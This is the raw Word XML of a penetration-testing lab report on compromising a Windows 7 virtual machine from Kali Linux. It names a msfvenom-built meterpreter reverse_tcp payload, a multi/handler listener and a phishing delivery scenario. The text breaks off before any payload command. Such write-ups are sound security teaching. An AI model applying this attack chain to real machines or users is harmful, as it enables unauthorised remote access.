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E3A1" w14:textId="6064A30C" w:rsidR="004C506B" w:rsidRPr="00AD2318" w:rsidRDefault="00AD2318" w:rsidP="00AD2318">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc148233808"/>
      <w:r w:rsidRPr="00AD2318">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Windows Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266E2FD0" w14:textId="77777777" w:rsidR="004C506B" w:rsidRDefault="004C506B" w:rsidP="004C506B"/>
    <w:p w14:paraId="5D1BA786" w14:textId="335386FC" w:rsidR="00AE38E3" w:rsidRPr="004C506B" w:rsidRDefault="004C506B" w:rsidP="004C506B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc148744735"/>
      <w:r>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r w:rsidR="00C74136" w:rsidRPr="004C506B">
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="5B080BCB" w14:textId="16E95DBA" w:rsidR="00C74136" w:rsidRPr="004C506B" w:rsidRDefault="006A3FE1" w:rsidP="004C506B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="444E54"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc148233809"/>
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">In this lab we will try to exploit Windows OS by help of Metasploit Framework, we need to test </w:t>
      </w:r>
      <w:r w:rsidR="003B2088" w:rsidRPr="004C506B">
        <w:t xml:space="preserve">security </w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:t>of Windows OS</w:t>
      </w:r>
      <w:r w:rsidR="003B2088" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:t>need to find</w:t>
      </w:r>
      <w:r w:rsidR="003B2088" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> vulnerabilities. This report demonstrates the security flaws in the</w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> Windows OS</w:t>
      </w:r>
      <w:r w:rsidR="003B2088" w:rsidRPr="004C506B">
        <w:t>. By this document</w:t>
      </w:r>
      <w:r w:rsidR="000D1B84" w:rsidRPr="004C506B">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00FB323C" w:rsidRPr="004C506B">
        <w:t>we</w:t>
      </w:r>
      <w:r w:rsidR="000D1B84" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> will see exploiting a windows vulnerability to logging into the system without username and password using Metasploit. </w:t>
      </w:r>
      <w:r w:rsidR="00110504" w:rsidRPr="004C506B">
        <w:t>All necessary steps to attain privilege access will be mentioned in this</w:t>
      </w:r>
      <w:r w:rsidR="00110504" w:rsidRPr="004C506B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="444E54"/>
        </w:rPr>
        <w:t xml:space="preserve"> report</w:t>
      </w:r>
      <w:r w:rsidR="00110504" w:rsidRPr="004C506B">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="444E54"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidR="00110504" w:rsidRPr="004C506B">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="444E54"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="003B2088" w:rsidRPr="004C506B">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="444E54"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB9150" w14:textId="7BE50685" w:rsidR="008E0CB7" w:rsidRPr="004C506B" w:rsidRDefault="008E0CB7" w:rsidP="004C506B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="444E54"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="444E54"/>
        </w:rPr>
        <w:t xml:space="preserve">Name- </w:t>
      </w:r>
      <w:r w:rsidR="006A3FE1" w:rsidRPr="004C506B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="444E54"/>
        </w:rPr>
        <w:t>Windows Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24ACF024" w14:textId="6F4D4D04" w:rsidR="008E0CB7" w:rsidRPr="004C506B" w:rsidRDefault="008E0CB7" w:rsidP="004C506B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="444E54"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="444E54"/>
        </w:rPr>
        <w:t xml:space="preserve">OS Type- </w:t>
      </w:r>
      <w:r w:rsidR="006A3FE1" w:rsidRPr="004C506B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="444E54"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A71023A" w14:textId="6DC8A045" w:rsidR="008E0CB7" w:rsidRPr="004C506B" w:rsidRDefault="008E0CB7" w:rsidP="004C506B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Download Source: - </w:t>
      </w:r>
      <w:r w:rsidR="000D1B84" w:rsidRPr="004C506B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>NA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059CF3C1" w14:textId="77777777" w:rsidR="00C74136" w:rsidRPr="004C506B" w:rsidRDefault="00C74136" w:rsidP="004C506B"/>
    <w:p w14:paraId="18F2F973" w14:textId="5D534B30" w:rsidR="00C74136" w:rsidRPr="004C506B" w:rsidRDefault="004C506B" w:rsidP="004C506B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc148233810"/>
      <w:bookmarkStart w:id="4" w:name="_Toc148744736"/>
      <w:r>
        <w:t xml:space="preserve">1.2 </w:t>
      </w:r>
      <w:r w:rsidR="00C74136" w:rsidRPr="004C506B">
        <w:t>Objective</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="50A5207B" w14:textId="748714C8" w:rsidR="002F5585" w:rsidRPr="004C506B" w:rsidRDefault="002F5585" w:rsidP="004C506B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Objective</w:t>
      </w:r>
      <w:r w:rsidR="000D1B84" w:rsidRPr="004C506B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to solve this machine to attain root access of the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04470AD8" w14:textId="7C66921F" w:rsidR="002F5585" w:rsidRPr="004C506B" w:rsidRDefault="002F5585" w:rsidP="004C506B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We will use Metasploit tool i.e., inside Kali Linux to attain root access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436DAAA9" w14:textId="77777777" w:rsidR="002F5585" w:rsidRPr="004C506B" w:rsidRDefault="002F5585" w:rsidP="004C506B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We will proceed by basic fundamental steps of Ethical Hacking, that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD60730" w14:textId="650F37AF" w:rsidR="002F5585" w:rsidRPr="004C506B" w:rsidRDefault="002F5585" w:rsidP="004C506B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">– Information Gathering and Scanning </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64552E98" w14:textId="0E1FFE6D" w:rsidR="002F5585" w:rsidRPr="004C506B" w:rsidRDefault="002F5585" w:rsidP="004C506B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>– Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01717203" w14:textId="7A9AA3D0" w:rsidR="00C74136" w:rsidRPr="004C506B" w:rsidRDefault="00263DC5" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">– Gain and Maintaining Access </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FCB6D0" w14:textId="77777777" w:rsidR="00263DC5" w:rsidRPr="004C506B" w:rsidRDefault="00263DC5" w:rsidP="004C506B"/>
    <w:p w14:paraId="06B23751" w14:textId="567E3E17" w:rsidR="00263DC5" w:rsidRPr="004C506B" w:rsidRDefault="004C506B" w:rsidP="004C506B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc148233811"/>
      <w:bookmarkStart w:id="6" w:name="_Toc148744737"/>
      <w:r>
        <w:t xml:space="preserve">1.3 </w:t>
      </w:r>
      <w:r w:rsidR="00263DC5" w:rsidRPr="004C506B">
        <w:t>Tools Used</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="4524C12E" w14:textId="7B4EF246" w:rsidR="00C74136" w:rsidRPr="004C506B" w:rsidRDefault="00AF22C4" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="008E0CB7" w:rsidRPr="004C506B">
        <w:t>etdiscover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12122D67" w14:textId="1530EE2B" w:rsidR="002F5DC1" w:rsidRPr="004C506B" w:rsidRDefault="002F5DC1" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t>Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CE7B49" w14:textId="3A0FDD31" w:rsidR="002F5DC1" w:rsidRPr="004C506B" w:rsidRDefault="002F5DC1" w:rsidP="004C506B">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C506B">
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D190868" w14:textId="0C70336A" w:rsidR="00BC6CF3" w:rsidRPr="004C506B" w:rsidRDefault="00AF22C4" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="008E0CB7" w:rsidRPr="004C506B">
        <w:t>etasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDF7DF0" w14:textId="758134BF" w:rsidR="00AC5DB0" w:rsidRPr="004C506B" w:rsidRDefault="004C506B" w:rsidP="004C506B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc148233812"/>
      <w:bookmarkStart w:id="8" w:name="_Toc148744738"/>
      <w:r>
        <w:t xml:space="preserve">2.0 </w:t>
      </w:r>
      <w:r w:rsidR="00FB323C" w:rsidRPr="004C506B">
        <w:t>Windows Hacking</w:t>
      </w:r>
      <w:r w:rsidR="008E0CB7" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> – Short Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="73A841CB" w14:textId="70A18240" w:rsidR="00AF22C4" w:rsidRPr="004C506B" w:rsidRDefault="00AF22C4" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">Target IP: </w:t>
      </w:r>
      <w:r w:rsidR="00C42422" w:rsidRPr="004C506B">
        <w:t>192.168.1.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F104D4" w14:textId="11666511" w:rsidR="00AF22C4" w:rsidRPr="004C506B" w:rsidRDefault="00AF22C4" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">Target Machine: </w:t>
      </w:r>
      <w:r w:rsidR="00A0644B" w:rsidRPr="004C506B">
        <w:t>Windows 7</w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71530B0F" w14:textId="1B6BAE19" w:rsidR="00AF22C4" w:rsidRPr="004C506B" w:rsidRDefault="00AF22C4" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">Vulnerability Name: </w:t>
      </w:r>
      <w:r w:rsidR="00C42422" w:rsidRPr="004C506B">
        <w:t>Multi Handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DC3AAF" w14:textId="5BC07D4F" w:rsidR="00AF22C4" w:rsidRPr="004C506B" w:rsidRDefault="00AF22C4" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">Vulnerability Exploited: </w:t>
      </w:r>
      <w:r w:rsidR="00C42422" w:rsidRPr="004C506B">
        <w:t>multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C40558" w14:textId="77777777" w:rsidR="00AF22C4" w:rsidRPr="004C506B" w:rsidRDefault="00AF22C4" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">Vulnerability Exploited With: Metasploit Framework </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37819019" w14:textId="3C4F2B3D" w:rsidR="00AC5DB0" w:rsidRPr="004C506B" w:rsidRDefault="00AF22C4" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">Payload Used: </w:t>
      </w:r>
      <w:r w:rsidR="00C42422" w:rsidRPr="004C506B">
        <w:t>windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C42422" w:rsidRPr="004C506B">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C42422" w:rsidRPr="004C506B">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C42422" w:rsidRPr="004C506B">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="122D9EC8" w14:textId="77777777" w:rsidR="00AC5DB0" w:rsidRPr="004C506B" w:rsidRDefault="00AC5DB0" w:rsidP="004C506B"/>
    <w:p w14:paraId="25E82532" w14:textId="12C090A4" w:rsidR="00A0644B" w:rsidRPr="004C506B" w:rsidRDefault="004C506B" w:rsidP="004C506B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc148233813"/>
      <w:bookmarkStart w:id="10" w:name="_Toc148744739"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.0 </w:t>
      </w:r>
      <w:r w:rsidR="00A0644B" w:rsidRPr="004C506B">
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r w:rsidR="00FB323C" w:rsidRPr="004C506B">
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00A0644B" w:rsidRPr="004C506B">
        <w:t>acking</w:t>
      </w:r>
      <w:r w:rsidR="008E0CB7" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> – Methodology</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidR="008E0CB7" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E954A5" w14:textId="354BFAA0" w:rsidR="00537362" w:rsidRPr="004C506B" w:rsidRDefault="00A0644B" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">Windows 7 </w:t>
      </w:r>
      <w:r w:rsidR="00537362" w:rsidRPr="004C506B">
        <w:t xml:space="preserve">machine that runs on </w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00537362" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">based </w:t>
      </w:r>
      <w:r w:rsidR="008877EA" w:rsidRPr="004C506B">
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidR="00537362" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:t>to penetrate in the machine we will use Metasploit Framework i.e., preinstalled inside Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EA343D" w14:textId="0A380EE0" w:rsidR="00A0644B" w:rsidRPr="004C506B" w:rsidRDefault="00A0644B" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">We will develop a malware by Metasploit Framework to gain root access of the Windows 7 OS.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE37033" w14:textId="423B3F02" w:rsidR="008877EA" w:rsidRPr="004C506B" w:rsidRDefault="003B10DF" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75ED1926" wp14:editId="23EAB673">
            <wp:extent cx="5715294" cy="1797142"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14719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837" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715294" cy="1797142"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFCE725" w14:textId="7B608170" w:rsidR="008877EA" w:rsidRPr="004C506B" w:rsidRDefault="008877EA" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t>We will use Kali Linux as attacker machine and Metasploit framework as mode of exploit.</w:t>
      </w:r>
      <w:r w:rsidR="00C42422" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C42422" w:rsidRPr="004C506B">
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C42422" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> will also be used here to create malware to get root access of the Windows 7 OS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA7C51D" w14:textId="58BD821D" w:rsidR="00C42422" w:rsidRPr="004C506B" w:rsidRDefault="00C42422" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">We may consider a scenario of someone getting a link on email and victim unknowingly </w:t>
      </w:r>
      <w:r w:rsidR="009B477C" w:rsidRPr="004C506B">
        <w:t>click on that link and an .exe file gets automatically downloaded in Windows 7 and attacker will get root access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD8CAF1" w14:textId="6084BEAE" w:rsidR="008877EA" w:rsidRPr="004C506B" w:rsidRDefault="009B477C" w:rsidP="004C506B">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004C506B">
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> to proceed further we need to power on both the machines Kali Linux and Windows 7 machine on VMware, make sure that network connections of both the machines are bridged or on the same network before powering on the virtual machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5E8BCF" w14:textId="77777777" w:rsidR="002F5DC1" w:rsidRPr="004C506B" w:rsidRDefault="002F5DC1" w:rsidP="004C506B">
      <w:bookmarkStart w:id="11" w:name="_Toc148233814"/>
    </w:p>
    <w:p w14:paraId="3ABD764C" w14:textId="775F7548" w:rsidR="008877EA" w:rsidRPr="004C506B" w:rsidRDefault="004C506B" w:rsidP="004C506B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc148744740"/>
      <w:r>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r w:rsidR="009B477C" w:rsidRPr="004C506B">
        <w:t>Windows Hacking</w:t>
      </w:r>
      <w:r w:rsidR="008877EA" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> – Information Gathering and Scanning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidR="008877EA" w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F99F995" w14:textId="4FF1540A" w:rsidR="002F5DC1" w:rsidRPr="004C506B" w:rsidRDefault="008877EA" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t>We first need to see our IP assigned to both the s</w:t>
      </w:r>
      <w:r w:rsidR="000E7F21" w:rsidRPr="004C506B">
        <w:t>ystems, to check that we will first have to open terminal by Ctrl + Alt +T. Now write the command “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000E7F21" w:rsidRPr="004C506B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E7F21" w:rsidRPr="004C506B">
        <w:t>” to check IP address assigned to the interface of attacker machine means our machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088E3377" w14:textId="6643E0B1" w:rsidR="00646893" w:rsidRPr="004C506B" w:rsidRDefault="00646893" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B318FFF" wp14:editId="0DA845DF">
            <wp:extent cx="5396865" cy="3041650"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="22696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3918" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5396865" cy="3041650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB8D596" w14:textId="20551C87" w:rsidR="008877EA" w:rsidRPr="004C506B" w:rsidRDefault="00646893" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Now </w:t>
      </w:r>
      <w:r w:rsidR="00B65874" w:rsidRPr="004C506B">
        <w:t xml:space="preserve">we should </w:t>
      </w:r>
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">to check IP address of </w:t>
      </w:r>
      <w:r w:rsidR="009B477C" w:rsidRPr="004C506B">
        <w:t>Windows 7</w:t>
      </w:r>
      <w:r w:rsidR="00B65874" w:rsidRPr="004C506B">
        <w:t>: -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72866815" w14:textId="10659D58" w:rsidR="009B477C" w:rsidRPr="004C506B" w:rsidRDefault="00B65874" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2551F883" wp14:editId="07E3ED71">
            <wp:extent cx="5251450" cy="3635618"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3175"/>
            <wp:docPr id="206235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7127" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5258722" cy="3640652"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="420C83F3" w14:textId="77777777" w:rsidR="00464B98" w:rsidRPr="004C506B" w:rsidRDefault="00B65874" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">192.168.1.36 is the target IP address and it is in the same network i.e., 192.168.1.0/24. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791B36E5" w14:textId="732464D8" w:rsidR="00464B98" w:rsidRPr="004C506B" w:rsidRDefault="00464B98" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t>Being an attacker, we can check target IP by netdiscover command: -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D89C2B7" w14:textId="4EAEF7F8" w:rsidR="009B477C" w:rsidRPr="004C506B" w:rsidRDefault="00B65874" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00464B98" w:rsidRPr="004C506B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="296BBDE3" wp14:editId="035C278A">
            <wp:extent cx="5694045" cy="3067050"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="113486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937" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5697562" cy="3068944"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8C4DAE" w14:textId="561CDEDD" w:rsidR="00421A75" w:rsidRPr="004C506B" w:rsidRDefault="00464B98" w:rsidP="004C506B">
      <w:r w:rsidRPr="004C506B">
        <w:t xml:space="preserve">Next action is to develop malware by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
